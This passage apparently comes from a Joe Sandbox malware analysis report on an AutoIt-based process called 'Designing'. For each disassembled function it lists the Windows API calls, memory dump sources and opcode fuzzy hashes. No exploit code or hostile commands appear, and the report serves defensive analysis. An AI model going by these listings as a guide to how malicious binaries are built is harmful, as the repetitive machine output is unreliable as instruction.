                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Type$Register$FileLoadModuleNameUser
                                              • String ID:
                                              • API String ID: 1352324309-0
                                              • Opcode ID: 1e92fee3c6dbebdd2017d0214baefaefaddcebed99aa34cf495ccae7eb7845dc
                                              • Instruction ID: 51b5369c2b62675582f21fcdf804aa6e25662af275e2ca9cb7a2b7a988dc80ec
                                              • Opcode Fuzzy Hash: 1e92fee3c6dbebdd2017d0214baefaefaddcebed99aa34cf495ccae7eb7845dc
                                              • Instruction Fuzzy Hash: 91115EB5205304DBE7349F51ED49FE3BBFCEB04B04F108599A626D6160D7B0E5049BA1
                                              Function 00B671E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                              • String ID:
                                              • API String ID: 3016257755-0
                                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction ID: 428a7bbf0427565c4aa1ef583102818e6b299b057d57c8877a342f6de30b310c
                                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                              • Instruction Fuzzy Hash: AD01953208814EBBCF125F84CC51CED3FA2FB1A358B148595FA1858131CB3AC9B1AB81
                                              Function 00BBB937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowRect.USER32(?,?), ref: 00BBB956
                                              • ScreenToClient.USER32(?,?), ref: 00BBB96E
                                              • ScreenToClient.USER32(?,?), ref: 00BBB992
                                              • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BBB9AD
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ClientRectScreen$InvalidateWindow
                                              • String ID:
                                              • API String ID: 357397906-0
                                              • Opcode ID: 6c59478e163324b2364dc336bf5a22addbfbb5b8ebf790ba52e52743b0273521
                                              • Instruction ID: 70b83b249461a948343e05d94acb9900e2204a495d3554c1ceebe9a4880815d1
                                              • Opcode Fuzzy Hash: 6c59478e163324b2364dc336bf5a22addbfbb5b8ebf790ba52e52743b0273521
                                              • Instruction Fuzzy Hash: 501144B9D00209EFDB41DF98C984AEEBBF9FF48310F104166E954E3610D775AA658F50
                                              Function 00BBBCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BBBCB6
                                              • _memset.LIBCMT ref: 00BBBCC5
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00BF8F20,00BF8F64), ref: 00BBBCF4
                                              • CloseHandle.KERNEL32 ref: 00BBBD06
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memset$CloseCreateHandleProcess
                                              • String ID:
                                              • API String ID: 3277943733-0
                                              • Opcode ID: fe8f477f3dbeec74b9e6d4600161adc64f32575b90c169b758ec9f1d20760b69
                                              • Instruction ID: d374bf1e770236f1121d6bb21e27f96e2ca7f3503db70b594ff8efd2af3825b6
                                              • Opcode Fuzzy Hash: fe8f477f3dbeec74b9e6d4600161adc64f32575b90c169b758ec9f1d20760b69
                                              • Instruction Fuzzy Hash: E4F05EB2540304BFE7502761AC05FBB3A9DEB0C751F040861BE08DB1A2DFB54810C7A8
                                              Function 00B97195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                              Download Yara Rule
                                              APIs
                                              • EnterCriticalSection.KERNEL32(?), ref: 00B971A1
                                                • Part of subcall function 00B97C7F: _memset.LIBCMT ref: 00B97CB4
                                              • _memmove.LIBCMT ref: 00B971C4
                                              • _memset.LIBCMT ref: 00B971D1
                                              • LeaveCriticalSection.KERNEL32(?), ref: 00B971E1
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CriticalSection_memset$EnterLeave_memmove
                                              • String ID:
                                              • API String ID: 48991266-0
                                              • Opcode ID: afafcd24876caf77b8392ef6b4bf138bc4b6488dad42262c7c3ec1724377cc62
                                              • Instruction ID: 141b2f81667faef3afa405af590a0f26ec6b933587fb7a2aa5be145a5880a45a
                                              • Opcode Fuzzy Hash: afafcd24876caf77b8392ef6b4bf138bc4b6488dad42262c7c3ec1724377cc62
                                              • Instruction Fuzzy Hash: 38F05476100100ABCF016F55DC85F4ABB69EF49361F08C0A1FE085F26ACB31A915DBB4
                                              Function 00BBC3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B316CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B31729
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31738
                                                • Part of subcall function 00B316CF: BeginPath.GDI32(?), ref: 00B3174F
                                                • Part of subcall function 00B316CF: SelectObject.GDI32(?,00000000), ref: 00B31778
                                              • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BBC3E8
                                              • LineTo.GDI32(00000000,?,?), ref: 00BBC3F5
                                              • EndPath.GDI32(00000000), ref: 00BBC405
                                              • StrokePath.GDI32(00000000), ref: 00BBC413
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                              • String ID:
                                              • API String ID: 1539411459-0
                                              • Opcode ID: c7ba55e12b09c95af8f8cf465bae3deb514c63a7797e89d3ff007f7ba5e9330e
                                              • Instruction ID: 2baf7e9b0d6b440f841ac2520f3e3f373c00f2dc882b57504b0e67fd41e1b49c
                                              • Opcode Fuzzy Hash: c7ba55e12b09c95af8f8cf465bae3deb514c63a7797e89d3ff007f7ba5e9330e
                                              • Instruction Fuzzy Hash: 65F0BE31045218FBDB12AF55AC0EFEE3F99AF09311F048080FA51621E18BB41A50DBA9
                                              Function 00B8AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00B8AA6F
                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 00B8AA82
                                              • GetCurrentThreadId.KERNEL32 ref: 00B8AA89
                                              • AttachThreadInput.USER32(00000000), ref: 00B8AA90
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                              • String ID:
                                              • API String ID: 2710830443-0
                                              • Opcode ID: 77a54eca7321748887e699e64faf027f1278a428be1211b6a65bea7a8c9aa12c
                                              • Instruction ID: 80d2d62337dbdbee7f025d3bab3b57c15825e58ca2232d1c59cbc23226eb4a2b
                                              • Opcode Fuzzy Hash: 77a54eca7321748887e699e64faf027f1278a428be1211b6a65bea7a8c9aa12c
                                              • Instruction Fuzzy Hash: EAE06D31545228FAEB217FA2DD0CEE77F5CEF1A7A1F048022F50996460CB718550CBE0
                                              Function 00B325F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetSysColor.USER32(00000008), ref: 00B3260D
                                              • SetTextColor.GDI32(?,000000FF), ref: 00B32617
                                              • SetBkMode.GDI32(?,00000001), ref: 00B3262C
                                              • GetStockObject.GDI32(00000005), ref: 00B32634
                                              • GetWindowDC.USER32(?,00000000), ref: 00B6C1C4
                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B6C1D1
                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00B6C1EA
                                              • GetPixel.GDI32(00000000,00000000,?), ref: 00B6C203
                                              • GetPixel.GDI32(00000000,?,?), ref: 00B6C223
                                              • ReleaseDC.USER32(?,00000000), ref: 00B6C22E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                              • String ID:
                                              • API String ID: 1946975507-0
                                              • Opcode ID: 492e77e6cc176d388d1ea795f41a3786eeec6fd145cea38ecf004c850cfe18a4
                                              • Instruction ID: f77914a0725e61fba022026821d63dfec1ad471b351e791961dff2518962a6eb
                                              • Opcode Fuzzy Hash: 492e77e6cc176d388d1ea795f41a3786eeec6fd145cea38ecf004c850cfe18a4
                                              • Instruction Fuzzy Hash: C7E0E531514244FBDB216F64AC4DBE87F51EB19332F1483A6FA69590E18B714590DB11
                                              Function 00B89330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentThread.KERNEL32 ref: 00B89339
                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,00B88F04), ref: 00B89340
                                              • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00B88F04), ref: 00B8934D
                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,00B88F04), ref: 00B89354
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CurrentOpenProcessThreadToken
                                              • String ID:
                                              • API String ID: 3974789173-0
                                              • Opcode ID: aed373e88decd964a23a61f99b9d2eb1f20b87d146e5e3882e9dab5fac70618d
                                              • Instruction ID: 6e8451877032a9aead2336b1157a9a4909a8de7bc27341189b7fb5dd861a4172
                                              • Opcode Fuzzy Hash: aed373e88decd964a23a61f99b9d2eb1f20b87d146e5e3882e9dab5fac70618d
                                              • Instruction Fuzzy Hash: 77E08632611211DFDB203FB19D0DF563BACEF58791F154858B246CB090EA349444D758
                                              Function 00B70679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00B70679
                                              • GetDC.USER32(00000000), ref: 00B70683
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B706A3
                                              • ReleaseDC.USER32(?), ref: 00B706C4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: 5365795a476534a6390d6f809867637bb99c55ecb607d35983c4af973999cb81
                                              • Instruction ID: f4b8c38cc2872a044fd251a08567f20b283afe69b69da0e68a83162c3284cb5b
                                              • Opcode Fuzzy Hash: 5365795a476534a6390d6f809867637bb99c55ecb607d35983c4af973999cb81
                                              • Instruction Fuzzy Hash: 1CE01AB1810204EFCF01AFA0D848B5D7BF1EB8C311F218069F85AE7210DF3895519F50
                                              Function 00B7068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00B7068D
                                              • GetDC.USER32(00000000), ref: 00B70697
                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00B706A3
                                              • ReleaseDC.USER32(?), ref: 00B706C4
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CapsDesktopDeviceReleaseWindow
                                              • String ID:
                                              • API String ID: 2889604237-0
                                              • Opcode ID: dd50aacc13e990243d338682e442a0d817e28a656acfadf12242b91102dc2f71
                                              • Instruction ID: d4af0240cad2f188cd7f3798cb6268b48d044571caf6d38e9a10e1c1a7ba5eb3
                                              • Opcode Fuzzy Hash: dd50aacc13e990243d338682e442a0d817e28a656acfadf12242b91102dc2f71
                                              • Instruction Fuzzy Hash: BAE012B1810204EFCF11AFA0D808A9EBBF1AB8C311F218028F95AE7210DF3899518F50
                                              Function 00B8BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OleSetContainedObject.OLE32(?,00000001), ref: 00B8C057
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: ContainedObject
                                              • String ID: AutoIt3GUI$Container
                                              • API String ID: 3565006973-3941886329
                                              • Opcode ID: 3c9d497b27e5abb1f7a78957fa063f15fef4b309a59d04518f6eef46fe2a8bca
                                              • Instruction ID: ecd0e3a2f7f6d9cd958775159bfb60f4bb862c5bce4e2c2eb4fbaa899afc25aa
                                              • Opcode Fuzzy Hash: 3c9d497b27e5abb1f7a78957fa063f15fef4b309a59d04518f6eef46fe2a8bca
                                              • Instruction Fuzzy Hash: 5D913BB0200201DFDB54EF64C884E6ABBE5FF49710F1085ADE90ADB2A1DB71E845CB60
                                              Function 00B9B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                              • __wcsnicmp.LIBCMT ref: 00B9B670
                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00B9B739
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                              • String ID: LPT
                                              • API String ID: 3222508074-1350329615
                                              • Opcode ID: 63566c877b3a8d67432ac01782e384eae921f3d43582bf58d5b6aa439c56bf08
                                              • Instruction ID: 9526b2334dcf72499474ad50040847d46d5d8695f24d6694a3c9dacccb099a7c
                                              • Opcode Fuzzy Hash: 63566c877b3a8d67432ac01782e384eae921f3d43582bf58d5b6aa439c56bf08
                                              • Instruction Fuzzy Hash: A2618075A00219AFCF14EF94D991EAEB7F4EF48710F1141E9F506AB291DB34AE40CB50
                                              Function 00B3E00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNEL32(00000000), ref: 00B3E01E
                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 00B3E037
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: GlobalMemorySleepStatus
                                              • String ID: @
                                              • API String ID: 2783356886-2766056989
                                              • Opcode ID: b08f368ebb362a785d562052acd563148e6216e1c25dba1801be88f4b034da5d
                                              • Instruction ID: 92e3ec6b52b6669505bd5b1c9dbe27f43e23ee9c64ac402f8b65dfe7de293b4d
                                              • Opcode Fuzzy Hash: b08f368ebb362a785d562052acd563148e6216e1c25dba1801be88f4b034da5d
                                              • Instruction Fuzzy Hash: EF514B71418B449BE320AF50E886BAFB7F8FF85314F51489EF1D942191EF70A929CB16
                                              Function 00BB8096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00BB8186
                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00BB819B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID: '
                                              • API String ID: 3850602802-1997036262
                                              • Opcode ID: 99ff51c518f183f3565e3ffb8068a22a45b9bf6ae3d2e0f7e60c9eca1395e97d
                                              • Instruction ID: 0d830d8eecdf9abb96aac9d08423f7e8b0af18f976bee338c4d2314eb143e0cc
                                              • Opcode Fuzzy Hash: 99ff51c518f183f3565e3ffb8068a22a45b9bf6ae3d2e0f7e60c9eca1395e97d
                                              • Instruction Fuzzy Hash: DD411974A012099FDB14DF68D881BEA7BF9FF08340F1041AAE904EB351DB71A956CFA0
                                              Function 00BA2C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BA2C6A
                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00BA2CA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: CrackInternet_memset
                                              • String ID: |
                                              • API String ID: 1413715105-2343686810
                                              • Opcode ID: 099ed9da83e9da3461579562e3d4a362e5076c002357b1bc8df4033800a99b0b
                                              • Instruction ID: de84c1cd4fae0fe28deeae6203a3b0aefbaba0be2ebb7fa45985b856ed763edb
                                              • Opcode Fuzzy Hash: 099ed9da83e9da3461579562e3d4a362e5076c002357b1bc8df4033800a99b0b
                                              • Instruction Fuzzy Hash: 62311E71C00119ABCF11EFA8CC85AEEBFF9FF09314F1000A9F815A6162DB315A56DBA4
                                              Function 00BB7088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                              Download Yara Rule
                                              APIs
                                              • DestroyWindow.USER32(?,?,?,?), ref: 00BB713C
                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00BB7178
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
